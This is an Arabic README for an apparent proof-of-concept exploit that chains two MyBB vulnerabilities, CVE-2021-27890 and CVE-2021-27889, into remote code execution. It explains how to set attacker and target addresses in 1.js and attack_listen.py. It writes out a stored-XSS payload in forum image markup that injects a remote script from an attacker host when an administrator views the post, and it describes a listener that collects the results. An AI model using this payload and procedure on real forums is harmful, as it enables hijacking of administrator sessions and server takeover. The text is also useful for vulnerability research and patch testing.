
Mybb يربط CVE-2021-27890 & CVE-2021-27889 بـ RCE poc
Mybb يربط CVE-2021-27890 & CVE-2021-27889 بـ RCE poc
قبل الاستخدام:
يوجد ملفان هنا: 1.js و attack_listen.py
يجب تعديل هذين الملفين:
1.js:
عدّل رابط منتدى mybb ورابط الهجوم:
var bashurl = 'http://192.168.92.164/mybb/mybb-mybb_1825' #mybb forum url
var attack_url = 'http://192.168.92.165:8080/attack_success' #change the attack machine ip.should keep the same with the attack_listen.py
attack_listen.py
عدّل مضيف الهجوم ومنفذ الهجوم:
attack_host = '192.168.92.165'
attack_port = 8080
الاستخدام:
CVE-2021-27889 هو xss. يجب حقن الحمولة التالية في "New Post Thread" أو "Reply" أو "Private Messages" قبل تنفيذ الهجوم. في هذا العرض التوضيحي، أرسلت الحمولة إلى "New Post Thread"
لاحظ أن 192.168.92.165 هو عنوان IP للخادم الخبيث، يجب تغييره.
[img]http://evil.com/xx(http://evil.com/onerror=xs1=String.fromCharCode(47);xa1=document.createElement(/script/.source);xa1.src=xs1+xs1+/192.168.92.165/.source+xs1+/1.js/.source;document.getElementById(/header/.source).append(xa1);//[/img]

الآن، تم حقن ملف js الخبيث 1.js بنجاح. ثم يجب أن ننتظر حتى يقوم مسؤول بتصفح هذا المنشور مع كookie صفحة المسؤول التي سجل الدخول بها.
لاحظ أن المستخدم المسؤول ليس بالضرورة أن يكون قد سجل الدخول إلى صفحة المنتدى.
في وقت الانتظار، يجب تشغيل "attack_listen.py" على جهاز الهجوم الخاص بنا، لتحديد ما إذا تم مهاجمة المستخدم المسؤول.
python3 attack_listen.py
عندما يتصفح المستخدم المسؤول المنشور الخبيث، سيقوم الـ js الخبيث بتنفيذ الهجوم:

يمكننا استلام المعلومات على جهاز الهجوم الخاص بنا:

